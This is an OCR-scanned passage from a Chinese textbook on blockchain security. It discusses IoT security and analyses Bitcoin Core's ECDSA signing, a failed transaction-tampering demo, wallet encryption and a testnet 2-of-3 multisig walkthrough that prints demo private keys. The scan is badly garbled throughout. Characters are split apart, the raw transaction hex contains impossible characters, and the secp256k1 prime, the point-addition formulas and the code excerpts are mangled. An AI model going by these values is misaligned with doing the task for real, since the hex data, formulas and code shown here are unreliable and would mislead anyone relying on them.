比如 ， 如 果 一 个 病人 的 心脏 起 搏 器 或 者 汽车 的 刹车 被 黑客 控制 ， 病 人 和 车 上 乘客 的 生命 就 会 受到 威胁 。 因 此 ， 信 息 安 全 需要 物理 安全 性 。 下 面 将 详细 探讨 区 块 链 和 物 联网 安全 的 关系 。 


1.4.1 物 联 网 和 安全 性 


物 联网 具有 普通 对 象 设备 化 、 自 治 终端 互联 化 和 普 适 服务 智能 化 3 个 重要 特征 。 按 照 国际 电信 联盟 (ITU) 的 定义 ， 物 联网 主要 解决 物品 与 物品 (Thing to Thing，T2T) 、 人 与 物品 (Human to 
Thing，H2T) 、 人 与 人 (Human to Human，H2H) 之 间 的 互 连 。 但 是 与 传统 互联 网 不 同 的 是 ，H2T 是 指 人 利用 通用 装置 与 物品 之 间 的 连接 ， 从 而 使 得 物品 连接 更 加 简化 ;而 H2H 是 指 人 与 人 之 间 不 依 
赖 于 PC 而 进行 的 互 连 。 人 到 机 器 的 交互 一 直 是 人 体 工程 学 和 人 机 界面 等 领域 研究 的 主要 课题 ;而 机 器 与 机 器 之 间 的 交互 已 经 由 互联 网 提供 了 最 为 成 功 的 方案 。 从 本 质 上 而 言 ， 人 与 机 器 、 机 器 与 机 器 的 交 
互 ， 大 部 分 是 为 了 实现 人 与 人 之 间 的 信息 交互 。 


物 联网 除了 面 对 移 动 通信 网 络 的 传统 网 络 安全 问题 之 外 ， 还 存在 着 一 些 与 已 有 移动 网 络 安全 不 同 的 特殊 安全 问题 。 这 是 由 于 物 联 网 是 由 大 量 的 机 器 构成 ， 缺 少 人 对 设备 的 有 效 监 控 ， 并 且 数 量 庞大 、 
设备 集群 等 造成 的 。 这 些 特殊 的 安全 问题 主要 有 以 下 几 个 方面 。 


(1) 物 联网 机 器 /感知 节点 的 本 地 安全 问题 


由 于 物 联 网 的 应 用 可 以 取代 人 来 完成 一 些 复杂 、 人 危险 和 机 械 的 工作 ， 所 以 物 联网 机 器 /感知 节点 多 数 部 署 在 无 人 监控 的 场景 中 。 那 么 攻击 者 就 可 以 轻易 地 接触 到 这 些 设备 ， 从 而 对 它们 造成 破坏 ， 甚 至 
通过 本 地 操作 更 换 机 器 的 软 硬 件 。 区 块 链 本 身 的 技术 是 不 可 能 解决 这 个 安全 问题 的 。 


(2) 感知 网 络 的 传输 与 信息 安全 问题 
感知 节点 在 传输 的 过 程 中 ， 信 息 可 能 被 泄漏 或 自 改 。 区 块 链 可 以 在 一 定 程度 上 减少 这 种 安全 问题 。 比 如 感知 节点 与 区 块 链 网 络 可 以 建立 身份 认证 的 机 制 ， 利 用 加 密 的 通道 来 避免 信息 被 盗 取 或 自 改 。 
(3) 核心 网 络 的 传输 与 信息 安全 问题 


核心 网 络 具 有 相对 完整 的 安全 保护 能 力 ， 但 是 由 于 物 联 网 中 节点 数量 庞大 ， 且 以 集群 方式 人 存在， 因此 会 导致 在 数据 传播 时 ， 由 于 大 量 机 器 的 数据 发 送 使 网 络 拥塞 ， 容 易 引 发 DDoS 攻击 。 此 外 ， 现 有 通 
信 网 络 的 安全 架构 都 是 从 人 通信 的 角度 设计 的 ， 并 不 适用 于 机 器 的 通信 。 使 用 现 有 安全 机 制 会 割裂 物 联网 机 器 间 的 逻辑 关系 。 区 块 链 的 网 络 节点 可 以 是 物 联网 的 边缘 节点 。 在 感知 节点 和 核心 网 络 之 间 增 


加 区 块 链 的 边缘 节点 有 下 面 两 个 好 处 。 
第 一 ,减少 网 络 拥塞 现象 ， 边 缘 节 点 可 以 靠近 感知 节点 对 数据 进行 加 工 处 理 ， 对 数据 的 真 伪 进 行 判 断 ， 利 用 区 块 链 对 感知 节点 不 可 算 改 的 历史 数据 进行 比较 ， 对 于 不 正常 的 数据 0 进行 报警 。 


第 二 ,任何 修改 边缘 节点 或 者 核心 网 络 的 数据 都 会 被 区 块 链 通 过 共识 机 制 进行 修复 。 


1.4.2 ”区 块 链 和 和 物 联网 


由 于 物 联 网 的 节点 是 永远 在 线 的 ,无 疑 增加 了 被 木马 控制 的 机 会 。 例 如 无 人 机 干扰 民航 机 ， 很 可 能 就 是 被 木马 所 控制 ， 一 个 心脏 病人 的 心脏 起 捕 器 被 人 控制 ， 就 可 能 危及 其 生命 。 因 此 ， 在 物 联网 中 
安全 的 范畴 从 原来 的 CIA (保密 性 、 完 整 性 、 可 用 性 ) 被 拓展 到 了 物理 安全 性 。 需 要 注意 的 是 ， 物 联网 的 物理 属性 数字 化 不 是 区 块 链 能 解决 的 问题 。 只 有 数字 化 以 后 的 物 联 网 数据 才能 够 利用 区 块 链 市 来 的 
增强 安全 性 。 


可 以 将 区 块 链 的 两 个 最 大 特性 一 “数据 存 证 ”和 “智能 合约 ”引入 物 联 网 模型 ， 提 高 物 联网 的 安全 。 从 “数据 存 证 ”的 角度 来 看 ， 物 联网 中 产生 信息 的 主要 部 分 是 传感器 网 络 ， 其 中 包括 物 本 身 的 
ID 信息。 我 们 可 以 通过 区 块 链 对 传感器 网 络 产生 的 ID、 图 像 、 声 音 、 环 境 数 据 、 位 置 数据 进行 存 证 ， 利 用 区 块 链 数 据 无 法 纂 改 的 特性 来 保护 数据 ， 并 且 保 证 数据 的 可 溯源 性 。 例 如 ， 可 以 在 供应 链 上 追踪 
物品 ID 和 位 置信 息 ， 或 者 在 保险 领域 记录 突 友 事件 的 环境 数据 和 其 他 重要 的 机 器 状态 数据 ， 便 于 理赔 阶段 进行 证 伪 等 操作 。 


从 “智能 合约 ”的 角度 来 看 ， 传 感 器 网 络 产生 的 信息 本 身 具 备 价值 特性 ， 可 以 利用 智能 合约 催生 出 安全 的 、 具 备 自 主 资源 产生 能 力 的 设备 ， 这 些 设备 产生 的 资源 可 以 为 机 器 服务 ， 也 能 为 人 服务 。 从 
长 远 来 看 ， 物 联网 所 有 节点 的 身份 信息 都 会 存储 在 私有 或 者 公有 的 区 块 链 中 ， 物 物 (Machine to Machine，M2M) 之 间 的 交易 通过 区 块 链 的 安全 机 制 进行 验证 和 交易 一 定 会 带 来 新 的 安全 问题 ， 但 是 这 
不 会 阻止 物 联网 区 块 链 的 发 展 。 我 们 应 该 做 的 是 注意 物 联网 区 块 链 的 安全 漏洞 ， 并 且 制 定 有 效 的 流程 来 防御 和 避免 安全 事件 。 


1.5 ”本 章 小 结 


本 章 通过 安全 的 4 个 要 素 介绍 和 分 析 了 区 块 链 的 安全 属性 。 


第 一 个 要 素 是 保密 性 (Conf identiality) ， 在 这 一 方面 区 块 链 的 拓展 技术 比如 零 知识 证 明 、 同 态 加 密 等 可 以 友 挥 积极 的 作用 。 第 二 个 要 素 是 完整 性 (Integrity) ， 由 于 数字 签名 、 共 识 机 制 、 数 据 上 
链 及 时 间 戳 的 共同 作用 ， 数 据 的 完整 性 是 区 块 链 解决 得 比较 好 的 一 个 问题 。 第 三 个 要 素 是 可 用 性 (Availability) ， 由 于 目前 主流 区 块 链 的 性 能 问题 ， 可 用 性 是 区 块 链 重 点 需要 解决 的 问题 ， 应 加 大 研发 力 
度 。 随 着 物 联 网 的 发 展 ， 除 了 传统 信息 安全 的 3 个 要 素 以 外 ， 区 块 链 还 需要 考虑 物理 安全 性 。 本 章 对 每 一 个 安全 要 素 都 做 了 详细 的 分 析 ， 相 信 可 以 引起 读者 的 思考 ， 并 且 在 实际 工作 中 得 到 启发 。 


第 2 草 ”主流 区 块 链 安全 属性 分 析 


区 块 链 安全 是 信息 安全 的 一 个 应 用 领域 。 信 息 安全 是 指 保证 信息 系统 中 的 数据 在 存 取 、 处 理 、 传 输 和 服务 过 程 中 的 保密 性 、 完 整 性 和 可 用 性 ， 保 证 信息 系统 本 身 能 连续 、 可 靠 、 正 常 地 运行 ， 并 且 在 
遭 到 破坏 后 能 够 迅速 地 恢复 正常 使 用 。 在 世界 各 地 都 出 现 过 信息 系统 被 非 授权 用 户 非法 入 侵 的 事件 ， 使 得 系统 中 存储 的 数据 、 信 息 的 完整 性 、 保 密 性 受到 了 严重 威胁 。 这 类 入 侵 行 为 可 能 导致 信息 由 于 被 
破坏 而 不 能 继续 使 用 ， 或 是 使 得 系统 中 有 价值 和 秘密 的 信息 被 非法 窃取 、 和 修改 、 伪 造 或 删除 ， 从 而 给 使 用 者 造成 巨大 的 经 济 损失 。 另 外 ， 信 息 系 统 还 容易 遭受 各 种 不 可 抗拒 的 自然 灾害 的 破坏 ， 这 同样 需 
要 我 们 给 予 足够 的 重视 。 


目前 ， 区 块 链 的 应 用 已 经 得 到 了 广泛 的 讨论 ， 而 对 于 区 块 链 技 术 的 安全 属性 分 析 相 对 较 少 。 本 章 将 以 3 个 典型 的 区 块 链 应 用 一 一 比特 币 、 以 太 币 、Zcash 为 例 对 此 展开 分 析 。 


2.1 比特 币 


比特 币 (BitCoin) 是 一 种 P2P 形 式 的 数字 货币 。 点 对 点 的 传输 意味 着 一 个 去 中 心 化 的 支付 系统 。 比 特 币 不 依靠 特定 货币 机 构 友 行 ， 而 是 依据 特定 算法 ， 通 过 大 量 的 计算 产生 。 比 特 币 经 济 使 用 整个 
P2P 网 络 中 由 众多 节点 构成 的 分 布 式 数 据 库 来 确认 并 记录 所 有 的 交易 行为 ， 并 使 用 密码 学 的 设计 来 确保 货币 流通 中 各 个 环节 的 安全 性 。 


比特 币 的 核心 钱包 (Bitcoin Core) 可 以 在 https://github.com/bitcoin/bitcoin.git 下 载 ， 在 此 分 析 的 是 0.15.1 版 本 。 在 编译 之 前 ， 需 要 先 安装 libssl、libboost、libevent 等 依赖 库 。 如 果 出 现 问 题 ， 
可 在 doc 文 件 夹 下 查看 build 一 *.md 文 件 。Linux 中 的 安装 步骤 如 下 。 


1) autogen.sh。 

2) ./conf igure。 

3) make。 

4) make install, 

安装 后 会 在 src 文 件 夹 中 生成 bitcoind、bitcoin-cli、bitcoin-tx 3 个 可 执行 文件 。 


从 最 初 的 比特 币 源 代码 可 以 看 出 ， 比 特 币 系统 没有 明确 的 模块 划分 。 图 2-1 所 示 是 根据 目前 的 代码 情况 勾画 的 比特 币 架构 。 
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图 2-1 比特 币 架 构 
比特 币 源 代码 bitcoin 中 含有 两 个 与 密码 算法 相关 的 文件 夹 : secp256k1 和 和 crypto。 


secp256k1 文 件 夹 中 包含 了 一 个 椭圆 曲线 数字 签名 (Elliptic Curve Digital Signature Acgorithm，ECDSA) ， 选 用 的 椭圆 曲线 是 E():y*=x3+7， 其 中 p=2236-232-29-28-27-26-24-1。 这 条 曲线 是 
由 专注 于 椭圆 曲线 密码 技术 的 Certicom 公 司 在 SECG 标 准 中 推荐 的 。 在 比特 币 系 统 中 ，ECDSA 主 要 对 交易 信息 进行 签名 。 如 果 签 名 后 ， 再 对 交易 信息 修改 ， 就 可 以 通过 验证 签名 来 检测 出 来 。 


假设 用 户 A 和 用 户 B 进 行 交 易 ， 用 户 A 支 付 12 个 比特 币 到 用 户 B 的 地 址 muPB5AygrXA4eT4Tj3WJJnVtEYpqm91ygZ， 生 成 的 交易 原始 数据 如 下 。 


0100000001b82alc86ad0fa4f634dfc0cf82ca3ab996b10a5883520cea76al7b735bbflle0010 
0000000ffffffff02008c8647000000001976a91498191988a4686997pb024161668911f0910ac9 
20188ac6081ad2£f000000001976a9140e34abbd759901843cb0240cbcb3d841daa0de8388ac00000000 









































使 用 ECDSA 对 这 段 数据 签名 得 到 : 








0100000001b82alc86adq0fa4f634dqfc0cf82ca3ab996b10a5883520cea76a17p735pbf11le00100 
00006a4730440220531df7a34b069e0f8e9pb1095c172ef55524a9e5d4262d8fa7589f392c9g0 
14bf02204a8af854d4340a018ed499490039168406b5b8a2b74076e6db43d37533£f5971b90121 
03b8al0e3d5edab3ef718077fl5a91d607ede92bbc63df73d27afc22115e184epb6ffffffff02 
008c8647000000001976a91498191988a46869971b024161668911f0910ac920188ac6081agd2f0 
00000001976a9140e34abbd759901843cb0240cbcb3d841daa0de8388ac00000000 
























































解析 这 段 数据 ， 结 果 如 图 2-2 所 示 。 


tester@O0aé6c857cO319:~/bitcoin-testnet-box$ bitcoin-cli -datadir=1 decoderawtransaction 6 
160600001b82alc86adefa4f634dfcecf82ca3ab996b16a5883520cea76a17b735bbf1i1ie06010000006a47364 
49226531df7a3d4b669e6fs8e9b16095c172ef55524a9e5dd262d8fa7589f392C9d614bf6e2204a8af854d43406a 昌 
18ed4994960039168466b5b8a2b746976e6db43d37533f597b96912163b8aloe3d5edab3ef718077f15a91d6087e 
de92bbc63df73d27afc22115el84eb6ffffffffo26008c86476000000001976a91498191988a4686997b624161 
668911fO09109ac920188ac6081ad2f600000661976a9146e34abbd759901843cb6246cbcb3d841daabde8388a 
Cc0O0000000 
{ 

"txid"”: “Tf3396bbd4557326257918697488777C44ac9Cc6436f7C515892817ebb5d7a63fb”， 

"hash": "f3398bbd4557326257918697488777c44ac9c6438f7c515892817ebb5d7a63fb"， 

"size": 225, 

VSLZe : 225, 

“Version " : 1, 

"locktime": 日， 

"vin": [ 


"txid": "e811bfSsb737bal76eadc5283580abl96b93aca82cfcOdf34f6a40fad861c2ab8",， 
"vout”: 1, 
“SCrtiptsig : 

"asm": "304402260531df7a34b969e0f8e9b1695c172ef55524a9e5d4262d8fa7589f392c9d914bf 
62204a8af854d4346agl8ed499496639168406b5b8az2b74676e6db43d37533f597b9[ALL] 63b8aloe3d5eda 
b3ef718677f15a91d607ede92bbc63df73d27afc22115e184eb6”， 

Mi “4736440220531df7a34b6b69eofee9b16095cC172ef55524a9e5d4262d8fa7589f392C9d614 
bfe2204a8af854d4346a6lBed49949096391684606b5b8a2b74676e6db43d37533f597b9612163b8aloe3d5eda 
b3ef718077f15a91d607ede92bbc63df73d27afc2211S5el84eb6" 


}， 
" Sequence" : 4294967295 
} 


Vout : [ 


Value : 12.00000000 ， 
mi 09， 
"scriptPubKey”: { 


LA 
"hex": "76a91498191988a4686997b0624161668911f86916ac920188ac"， 
"reqSsigs": 1, 
"type": "pubkeyhash”", 
"addresses"”: [ 
“muPBSAygrXA4eT4T]3WJJNVtEYpqm91ygZ 


] 


上 
{ 


"value"”: 7.999860600, 
nn: 4, 
"scriptPubKkey"”: { 
"asm": "OP DUP OP HASH169 Qe34abbd759991843cb8246cbcb3d841daa9de83 OP EQUALVERIF 
LA 
"hex": "763a9140e34abbd759991843cb6249cbcb3d841daaode8388ac”， 
"reqsigs": 1, 
"type": "pubkeyhash", 
"addresses": [ 
"mgp4rNiCugBhORXGsP1dm4JDNUdSx9m83A" 


图 2-2 解析 后 的 交易 信息 
攻击 者 C 截 取 交 易 信息 后 ， 把 交易 的 接收 地 址 改 为 自己 的 地 址 mvXf3anW6XizkRB-AFfFMMt jwJr 2sL4ZuBd。 
修改 后 的 交易 原始 数据 为 : 


0100000001b82alc86ad0fa4f634dfc0cf82ca3ab996bl0a588 3520cea76al7b735bbflle001 
O00000000ffffffff02008c8647000000001976a914a4abe7500b3f7bb2ebd76b4a8fl1db900b79 
db0fc88ac6081ad2f000000001976a9140e34abbd759901843cpb0240cbcb3d841daa0de8388ac00000000 


其 中 加 粗 的 字符 对 应 修改 后 的 地 址 。 由 于 ECDSA 的 签名 需要 用 户 A 的 私 铀 ， 所 以 攻击 者 C 无 法 伪造 数字 签名 。 此 时 攻击 者 再 转发 交易 ， 将 返回 验 签 错 误 ， 如 图 2-3 所 示 。 





testerg@ea6cs57co3l9:~/bttcotn-testnet-boxS bitcoin-cli -datadtr=l sendrawtransaction 910 
egoeeeelb8z2zalc86adoefa4f634dfcocf8s2ca3ab996b16a58835209cea76al7b735bbflleoeleooooo6a4730440 
2269531df7a34b669egf8Be9b1695c1l72ef55524a9e5d4262d8fa7589f392c9d614bf9g2204a8af854d4346a018 
ed4994960639168406bs5b8azb746076e6db43d37533f597b90912103b8aloe3dsedab3ef7l8677f15a91d6697ede 
9g2bbc63df73d27afc221l1l5Sel84eb6ffffffff8620608c86479999996061976a914a4abe7566b3f7bb2ebd76b4a8 


fidb966b79dbefc88ac6681ad2f00096969991976a9140e34abbd759961843cb9246cbcb3d841daagde8388ac9 
0900600060 

error code: -26 

error Message: 

16: mandatory-script-verify-flag-failed (signature must be zero for failed CHECK(MULTI)S 
IG operation) 





图 2-3 ”验证 交易 

密码 设备 在 运算 过 程 中 会 泄漏 各 种 物理 信息 ， 如 功 耗 、 电 磁 辐 射 、 时 间 、 声 音 、 可 见 光 等 。 利 用 这 些 物 理 信息 也 是 可 以 破解 出 秘密 信息 的 ， 这 种 攻击 方法 称 为 侧 信道 攻击 。 这 类 新 型 攻击 的 有 效 性 远 
高 于 密码 分 析 的 数学 方法 ， 因 此 给 密码 设备 带 来 了 严重 的 威胁 。1996 年 美国 科学 家 Kocher 首 先 发 现 针对 密码 芯片 的 时 间 攻 击 法 局 。 该 方法 通过 对 密码 芯片 运算 过 程 中 执行 时 间 信 息 的 采集 ， 结 合 密码 算法 
的 内 部 实现 ， 证 实 了 算法 指令 和 执行 时 间 存 在 相关 性 ， 从 而 推测 出 密 钥 信息 。1999 年 ，Kocher 等 人 轨 又 提出 了 利用 功 耗 采集 数据 去 分 析 密 码 电路 中 的 秘密 信息 ， 并 提出 了 简单 功 耗 分 析 (SPA) 和 差分 功 
耗 分 析 (DPA) 的 方法 。 

比特 币 的 ECDSA 算 法 在 实现 过 程 中 考虑 了 防御 侧 信 道 攻击 。 比 如 ECDSA 会 调用 点 乘 算法 ， 而 点 乘 算 法 又 会 调用 点 加 、 倍 点 运算 。 通 常情 况 下 ， 桶 圆 曲 线 点 加 、 售 点 的 计算 公式 是 不 一 样 的 。 设 点 P= 
(x1,y1),Q=(Xz,y2)， 曲 线 y*=x3+b 的 点 加 公式 为 : 


= = XX = (x Xx) -yi 





,Xs3= 4, — 2X1, 3 = (xX — X33) -I 


为 了 防御 旁 路 分 析 ， 程 序 员 参 考 了 相关 文献 BI 中 的 方法 ， 使 用 相同 的 公式 计算 点 加 和 信和 点 : 
2 
_ (X1 + X2) 一 XI Xp 
yp1+ yy, 


图 2-4 所 示 是 比特 币 系 统 中 的 点 加 、 倍 点 程序 的 部 分 截屏 。 


4 X= (Ktx), 2°y73=4°* CT 和 一 2 xX) — Ot+y,) 


static void secp256k1 gej add ge(secp256k1 gej *r, const secp256k1 gej *a, const secp256k1 ge *b) { 
/* Operations: 7 mul, 5 sqr, 4 normalize, 21 mul int/add/negate/cmov */ 
static const secp256Kk1 fe fe 1 = SECP256K1 FE CONST(0, 0, 0, 90, 0, 09, 0, 1); 
1 + 和 7 eh 4 ,PW 
secp256k1 fe m alt, rr alt; 
int infinity, degenerate; 
VERIFY CHECK(!b->infinity); 
VERIFY CHECK(a->infinity == 0 || a->infinity == 1); 


/i** 工人: 


Eric Brier and Marc Joye, Weierstrass Elliptic Curves and Side-Channel Attacks. 
i In D. Naccache and P. A le 2274 of Lecture Notes in 
Springer -VerLag，2002. 
we find as solution for a Unified addition/doubling formula: 
Lambda = ((xl + Xx2)^2 DA 
x3 = lambda^2 - (X1 + X2) 
2wy3 = lanbda * (x1 + X2 - 2.* x3) - (yi1 + y2). 


SUDStTLECUECLNG XL = XL ZLN2 and YL = YU ZLA3S for ls1,.2.3, gtves: 
U1 = X172r2 U2 = M2*Z1n2 





图 2-4 点 加 、 倍 点 函数 


crypto 文 件 夹 主要 处 理 地 址 ， 采 用 了 SHA-256 和 RIMEMD-160 两 个 Hash 函 数 。 


同时 ，crypto 还 提供 了 Hash 逊 数 SHA-1。 强 烈 建 议 不 要 使 用 这 个 遂 数 ， 因 为 它 已 经 不 再 安全 。 国 家 密码 管理 局 在 2017 年 4 月 3 日 友 布 了 《关于 使 用 SHA-1 密 码 算法 的 风险 提示 》: 近期 ，SHA-1 杂 凑 密 
码 算法 碰撞 攻击 实例 公布 ， 对 SHA-1 算 法 的 攻击 从 理论 变 为 现实 ， 继 续 使 用 SHA-1 算 法 存在 重大 安全 风险 。 


比特 币 核心 钱包 (Bitcoin Core) 是 官方 发 布 的 用 于 管理 比特 币 私 钥 的 客户 端 。 拥 有 比特 币 地 址 的 私 钥 代 表 拥 有 对 应 的 比特 币 的 控制 权 。 为 了 防止 非 授权 用 户 使 用 比特 币 ， 以 及 防止 比特 币 被 资 ， 应 
该 对 比特 币 钱包 进行 加 密 。 加 密 比特 币 钱包 的 命令 为 : 





./bitcoin-cli encryptwallet <passphrase> 








加 密 完成 后 ， 需 要 重启 客户 端 来 加 载 加 密 后 的 钱包 。 进 行 交 易 前 ,需要 先 把 passphrase 存 入 内 存 ， 以 解密 钱包 。 





./bitcoin-cli walletpassphrase <passphrase> <timeout> 








timeout 是 指 该 口令 在 内 存 中 有 效 的 时 间 ， 计 时 单位 是 秒 。 超 过 这 个 时 间 后 ， 需 要 重新 调用 这 条 命令 。 为 了 安全 起 见 ，timeout 的 值 不 要 设置 得 很 长 ， 尽 量 做 到 每 次 交易 都 要 输入 一 次 口令 。 


私 钥 一 旦 丢失 将 无 法 恢复 ， 也 就 意味 着 比特 币 的 丢失 。 因 此 ， 备 份 好 钱包 非常 重要 。 备 份 钱包 的 命令 为 : 





./bitcoin-cli backupwallet <destination> 





这 条 命令 把 wallet.dat 文 件 复制 到 目标 文件 夹 中 。 为 了 安全 起 见 ，wallet.dat 应 该 备份 到 安全 的 地 方 ， 比 如 离线 的 U 盘 。 在 多 个 地 方 安全 地 保管 钱包 文件 可 防止 意外 情况 发 生 的 时 候 恢 复 。 


为 了 保证 资金 的 安全 性 。 还 可 以 使 用 冷 存储 ， 即 把 私 钥 存 储 在 一 台 永 不 上 线 的 计算 机 上 ， 交 易 时 使 用 离线 签名 。 具 体 步骤 为 : 首先 在 离线 计算 机 上 生成 钱包 wallet.dat， 并 生成 比特 币 地 址 ， 然 后 删除 
这 个 钱包 中 的 密 铀 ， 再 把 这 个 没有 密 钥 的 钱包 复制 到 在 线 计算 机 上 。 当 冷 存 储 比特 币 时 ， 只 需 把 比特 币 转账 到 该 钱包 中 的 地 址 ; 当 需 要 使 用 冷 存 储 的 比特 币 时 ， 需 要 首先 用 在 线 计 算 机 生成 未 签名 的 原始 
交易 RawTransaction ， 然 后 把 该 原始 交易 放 到 离线 计算 机 上 进行 签名 ， 最 后 使 用 在 线 计算 机 广播 签名 后 的 交易 。 但 是 ， 比 特 币 官方 钱包 Bitcoin Core 0.14.2 版 本 还 无 法 删除 wallet.dat 中 的 密 钥 ， 所 以 还 
不 支持 冷 存 储 。 可 以 使 用 其 他 钱包 进行 冷 存 储 ， 比 如 armory 钱 包 https//www.bitcoinarmory.com/。 


Bitcoin Core 钱 包 提 供 多 重 签名 ， 可 以 通过 createmultisig 命 令 来 生成 带 有 多 重 签名 的 地 址 。 下 面 演示 如 何 生 成 一 个 3 取 2 的 多 重 签名 地 址 ， 即 有 3 个 管理 员 ， 只 需 任意 两 个 完成 签名 ， 就 可 以 进行 交 
易 。 有 具体 过 程 如 下 : 


先生 成 3 个 管理 员 的 密 钥 。 为 了 达到 安全 级 别 lI|， 建 议 这 3 组 密 钥 在 不 同 地 方 生成 和 存储 ， 以 便 防范 火灾 、 洪 水 、 地 震 等 风险 。 
通过 ./bitcoin-cli getnewaddress<account> 得 到 3 个 地 址 : 

. mumwWHRHzXaS2fCYB6MrjSg2runDwxa4ZQ; 

. n3LoBtt2mmcTk5dchm7Ba4RbU7pVpE1q43，; 

* mrEmwE8r9Wq9sNefGWbpyqPS5uSZgscQDr4。 

利用 ./bitcoin-cli dumpprivkey<bitcoinaddress> 获 得 3 个 私 钥 : 

. cPzefVCmScBJWA2cQ7negHqw WpMzypwFfvxrw2ykPias1 9moC9Ssg; 
‘ cTuYQj2oumFLf4rWJHqJRxw9K3tsZoBH8488KaUbXWNz1jV5tPg ; 
. cUW3QnvoebJVSkJbvVEtUTBFYzsy6z1Pu5yQXfpF8HVTJkrqftAWk。 

再 利用 ./bitcoin-cli validateaddress<bitcoinaddress> 获 得 对 应 的 3 个 公 钥 : 
* 039f03c79800b56825dcafbb6c85c1f84964006a337c0d47b3albef7a5d835d897;，; 
“ 02c870602256f042039aec374al164e9168128ada4ddad498c02a50fdbf39e375c; 

“ 03fd9030258cdf1001335db26ef9fc7a3ae35063ff8b1356afeb81dd95b81bfdf56。 


然后 生成 多 重 签名 地 址 ， 如 图 2-5 所 示 。 





./bitcoin-cli createmultisig 2 <'["pubkeyl", "pubkey2", "pubkey3"]'> 








tester@0a6c857c9319:~/bitcoin-testnet-box$ bitcoin-cli -datadir=1 createmultisig 2 [| 93 
9f93c798060bs6825dcafbb6c85c1f84964696a337c0d47b3albef7a5d835d897","92c870602256f9429039ae 
c374a1164e9168128ada4ddad498c92a596fdbf39e375c","93fd9936258cdf1991335db26ef9fc7a3ae3563f 
f8bl356afeb81dd95b81bfdf56"]'" 


"address": "2N9ZbKkTZPPDNULwGDNxX7VbEdUus8nm1iUjC", 

"redeemscript": "5221039f93c7989690b56825dcafbb6c85c1f84964096a337c9d47b3albef7a5d835d89 
721062c870602256f942039aec374a1l164e9168128ada4ddad498c62a5efdbf39e375c2163fd9639258cdf166 
1335db26ef9fc7a3ae3563ff8b1356afeb81dd95b81bfdf5653ae" 

} 





图 2-5 生成 多 重 签名 地 址 


生成 的 地 址 为 2N9ZbKTZPPDnuiwGDNxX7VbEdus8nm1iUjC。 再 添加 多 重 签名 地 址 到 钱包 : 


./bitcoin-cli addmultisigaddress 2 <'["pubkeyl", "pubkey2", "pubkey3"]'> 





可 以 通过 ./bitcoin-cli getaddressesbyaccount<account> 来 查看 是 否 已 经 将 地 址 添加 到 钱包 。 接 下 来 ， 演 示 如 何 使 用 这 个 多 重 签名 地 址 进行 交易 。 


首先 使 用 命令 ./bitcoin-cli sendtoaddress<bitcoinaddress> <amount> 给 多 重 签名 地 址 2N9Z-bKTZPPDnuiwGDNxX7VbEdus8nm1iUjC 转 入 1 个 比特 币 。 然 后 创建 一 笔 交 易 ， 把 0.7 个 比特 币 从 这 
个 地 址 转 出 到 mvXf3anW6XizkRBAFfFMMtjwjJr2sL4ZuBd。./bitcoin-cli createrawtran-saction[{"txid":txid,"vout":n},http://www.hzcourse.com/resource/readBook? 
path=/openresources/teach ebook/uncompressed/17613/OEBPS/Text/...]{address:amount,http://www.hzcourse.com/resource/readBook? 


path=/openresources/teach ebook/uncompressed/17613/OEBPS/Text/...} 生 成 的 交易 原始 数据 为 : 











0100000001133cb5d63d89577c72413392ffc7e695c840d6ffa5fd5e0148pbd16d213e79acc01 
00000000f£ff£ffffff02801d2c04000000001976a914a4abe7500b3f7ibb2ebd76b4a8fldb900b79db0 



























































fc88ace03cc801000000001976a9140e34abbq759901843cb0240cbcb3q841qaa0dqe8388ac00000000 





使 用 第 一 个 地 址 对 应 的 私 钥 进 行 签 名 ， 如 图 2-6 所 示 。 


tester@O0a6c857c80319:~/bitcoin-testnet-box$ bitcoin-cli -datadir=1 signrawtransaction SRA 
W TX | 


VY 
| i | 


eid roUTNO TXID'” 
"vout": “SUTXO_VOUT ' ， 

"scriptPubKey": "'S$UTXO OUTPUT SCRIPT'", 
"redeemscript": "'SP2SH_REDEEM_SCRIPT' 


Fy = ld 


~ SNEW ADDRESS1 PRIVATE KEY 
]】 1 | 


"hex"”: "O01060000001d777bf783ce80a68017ealdcedeb53dda4924d8f5a4175a9c75e83ac335e891a01060 
OOO00b400473044622603fe7bS5a8fcabf6252429e9ef5417c6553cc2b47bif921f3bea8426d51fcfb3f1602201f 
5bb16895dded4d9b354aa1l9d9607124fbo5ac26f21865ada549614d4d569e484776014C695221639f63C79896b568 
25dcafbb6c8sclf849646606a337Ccod47b3albef7a5d835d8972102C8706602256f6426039aec374al1l64e91681 
28ada4ddad498c62za56ofdbf39e375c2163fd9030258cdf166961335db26ef9fc7a3ae3563fTfBb1356afeb81ldd9 
5b8glbfdf5653aeffffffffo2zBold2ce46600060001976a914a4abe756ob3f7bbz2ebd76b4a8ftdb969b79dbefc 
88ace03ccagoloooooooolo976a91469e34abbd759901843cb62z46cbcb3d841daaode8388acoo0o600006”， 

‘Complete : false, 

“errors : [ 


PR 
一 


"txid": "la895e33ac835ec7a975415a8f4d92a4dd5396beddcal7e91686a683c78bf77d7"， 

‘vout : 1, 

"scriptSsig": "004730449229693f97b5a8fcabf6252429e9ef5417cO553cc2b47b1if921f3bea8426d5 
lfcfb3f1l62201f5sbb16895dd64d9b354aal19d967124fbosac2o9f21865ada549614d569e484776014c69522103 
9fe3c798660b56825dcafbb6c8asclf84964066a337cod47b3albef7a5d835d8972162Cc8760602256f642039aeC 
374al1l64e9168128ada4ddad498c602a5ogfdbf39e375c2193fd993606258cdfl1001335db26ef9fc7a3ae3563ff8 
bi356afeb81dd95b81bfdf5653ae”",， 

“Sequence : 4294967295 ， 

"error": "Operation not valid with the current stack size' 


1 





图 2-6 第 一 次 签名 


从 图 2-6 可 以 发 现 ， 第 一 次 签名 后 ，complete 字 段 是 false ， 因 为 创建 的 地 址 2N9ZbKT-ZPPDnuiwGDNxX7VbEdus8nm1iUjC 需 要 至 少 两 次 签名 (这 样 可 以 提高 钱包 中 资产 的 安全 性 ) 。 使 用 第 二 个 
地 址 对 应 的 私 钥 进 行 签名 ， 图 2-7 所 示 。 


tester6ooea6c857c6319:~/bLtcotn-testnet-box9 bitcoin-cli -datadir=1 signrawtransaction S$PA 
RTLY_SIGNED RAW TX “" 
| 
{ 
txXxtd "SUTXO TXID'”", 
"vout": “SUTXO_VOUT ' ， 
"scriptPubKey": "'S$UTXO _ OUTPUT SCRIPT'", 
"redeemScript": "'S$P2SH_REDEEM_SCRIPT'" 


VY 


”SNEWN_ ADDRESS3 PRIVATE KEY "” 
] a 


"hex”: “9160600906001d777bf783c980a68017ealdcedob53dda4924d8f5a4175a9c75e83ac335e891a0100 
66060fc0047304462293f97b5a8fcabf6252429e9ef5417c965S53cc2b47b1f921f3bea8426d51fcfb3f1622861f 
